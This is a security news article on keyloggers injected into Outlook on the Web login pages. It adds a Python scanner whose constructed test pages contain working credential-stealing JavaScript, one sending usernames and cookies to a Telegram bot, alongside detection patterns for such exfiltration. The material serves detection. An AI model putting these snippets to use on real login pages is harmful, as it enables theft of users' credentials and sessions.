Researchers unearth keyloggers on Outlook login pages

by CybrGPT

Unknown threat actors have compromised internet-accessible Microsoft Exchange Servers of government organizations and companies around the world, and have injected the organizations’ Outlook on the Web (OWA) login page with browser-based keyloggers, Positive Technologies researchers have warned.

The keylogging JavaScript code (Source: Positive Technologies)

The initial vector for compromise is unknown

The researchers haven’t been able to pinpoint how the attackers gained access to the compromised servers.

Some of them were vulnerable to a slew of older vulnerabilities – including ProxyLogon (CVE-2021-26855), the three ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), and SMBGhost (CVE-2020-0796) – but others weren’t affected by publicly known vulnerabilities, so the attackers may have used other methods to compromise them.

What the researchers were able to establish is that the login pages have been compromised with either:

  • A JavaScript keylogger that grabs the login credentials (and occasionally the user's cookies) from the authentication form and writes them to a file on the compromised server, a file that is itself reachable from the internet, or
  • A JavaScript keylogger that exfiltrates the data to a Telegram bot or a Discord server and tags it so that the attackers know which organization the stolen credentials belong to.

Damage control

Servers affected by these attackers have been found in Vietnam, Russia, Taiwan, China, Australia, and other countries in Asia, Europe, Africa, and the Middle East.

“The majority of compromised servers were found in government organizations (22 servers belonging to government entities), as well as in the IT, industrial, and logistics companies,” the researchers noted.

Number of victims in different countries (Source: Positive Technologies)

The malicious JavaScript code is imperceptible to those who use the OWA login page to access their email, calendar, etc. via a browser.

But organizations can and should check all login pages and files related to user authentication for potentially malicious code, and inspect the Exchange Server installation folders (especially the web-accessible ones) for web shells, unexpected pages and unexplained recently modified files. Comparing the OWA authentication files against a known-good copy from the same Cumulative Update makes injected script blocks easy to spot. (To that end, the researchers have shared a helpful YARA rule.)
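One way to triage the OWA authentication pages for the kind of injected script the researchers describe, as an added example that is not the article's or Positive Technologies' code (and not their YARA rule): it pulls every script block out of the page, then flags a block when it references a Telegram bot or Discord webhook endpoint, or when it combines a network send with access to the username/password fields, a keystroke handler or document.cookie. The Exchange path, the form and field names and the three sample pages are assumptions constructed for the demonstration.

```python
"""Heuristic scan of OWA authentication pages for injected keylogger JavaScript.

Added example, not code from the article or from Positive Technologies. The
indicator list is this example's own choice of strings worth flagging, not a
published IOC set, so treat a hit as a lead for manual review, not as proof.
"""
from __future__ import annotations

import re
import sys
from dataclasses import dataclass
from pathlib import Path

# Assumption: default OWA auth folder of an Exchange 2016/2019 installation.
DEFAULT_ROOT = Path(r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth")

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
EXFIL_HOSTS = ("api.telegram.org/bot", "discord.com/api/webhooks", "discordapp.com/api/webhooks")
SEND_RE = re.compile(r"fetch\s*\(|XMLHttpRequest|navigator\.sendBeacon|\.src\s*=\s*[\"'`]", re.I)
CRED_RE = re.compile(r"\b(username|password|passwd|pwd)\b", re.I)
KEY_RE = re.compile(r"keydown|keyup|keypress", re.I)
COOKIE_RE = re.compile(r"document\.cookie")
URL_RE = re.compile(r"[\"'`](https?://[^\"'`\s]+|/[^\"'`\s]*)[\"'`]")


@dataclass
class Finding:
    path: str
    script_index: int   # which <script> block in the file (0-based)
    reasons: list[str]
    endpoints: list[str]  # URLs the block refers to, for the analyst to chase


def scan_text(label: str, text: str) -> list[Finding]:
    """Return one Finding per suspicious script block in an .aspx/.html page or a .js file."""
    blocks = [text] if label.lower().endswith(".js") else [m.group(1) for m in SCRIPT_RE.finditer(text)]
    findings = []
    for i, body in enumerate(blocks):
        reasons = [f"exfil endpoint {h}" for h in EXFIL_HOSTS if h in body.lower()]
        if SEND_RE.search(body):
            if CRED_RE.search(body):
                reasons.append("network send combined with credential field access")
            if KEY_RE.search(body):
                reasons.append("network send combined with keystroke handler")
            if COOKIE_RE.search(body):
                reasons.append("network send combined with document.cookie read")
        if reasons:
            findings.append(Finding(label, i, reasons, sorted(set(URL_RE.findall(body)))))
    return findings


def scan_directory(root: Path, suffixes=(".aspx", ".js", ".htm", ".html")) -> list[Finding]:
    findings = []
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in suffixes:
            findings.extend(scan_text(str(p), p.read_text(encoding="utf-8", errors="replace")))
    return findings


# Constructed sample pages (not real OWA files). The benign script touches the
# username field but never sends anything, so it must not be flagged.
CLEAN_LOGON = """<form action="/owa/auth.owa" method="POST" name="logonForm" id="logonForm">
<input id="username" name="username" type="text">
<input id="password" name="password" type="password">
</form>
<script type="text/javascript">
function focusFirstEmptyField() { if (document.logonForm.username.value === "") { document.logonForm.username.focus(); } }
</script>"""

# Variant 1 from the article: credentials posted to a page on the same server that drops them into a file.
INJECTED_LOCAL = CLEAN_LOGON + """
<script>
document.getElementById("logonForm").addEventListener("submit", function () {
  fetch("/owa/auth/save.aspx", { method: "POST", body: document.getElementById("username").value + ":" + document.getElementById("password").value });
});
</script>"""

# Variant 2 from the article: credentials, cookies and a host tag sent to a Telegram bot.
INJECTED_TELEGRAM = CLEAN_LOGON + """
<script>
var x = new XMLHttpRequest();
x.open("POST", "https://api.telegram.org/bot000:TOKEN/sendMessage");
x.send("chat_id=0&text=" + location.host + "|" + document.cookie + "|" + document.getElementById("username").value);
</script>"""


if __name__ == "__main__":
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else DEFAULT_ROOT
    for f in scan_directory(root):
        print(f"{f.path} script#{f.script_index}: {'; '.join(f.reasons)} -> {f.endpoints}")
```

Run it against the OWA auth folder (or any copy of it taken for forensics) and review every hit by hand; a block that only matches the endpoint rule still tells you where the data went, which is what the incident responder needs for the credential reset and session revocation that follow.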

Needless to say, organizations that discover they have been compromised should mount an in-depth investigation to establish whether the attackers have found their way into other systems and networks, and should reset the credentials of every user who signed in through the compromised page. Since some of the keyloggers also capture cookies, existing sessions for those users should be invalidated as well, not just their passwords changed.


© 2025 cybrgpt.com – All rights reserved.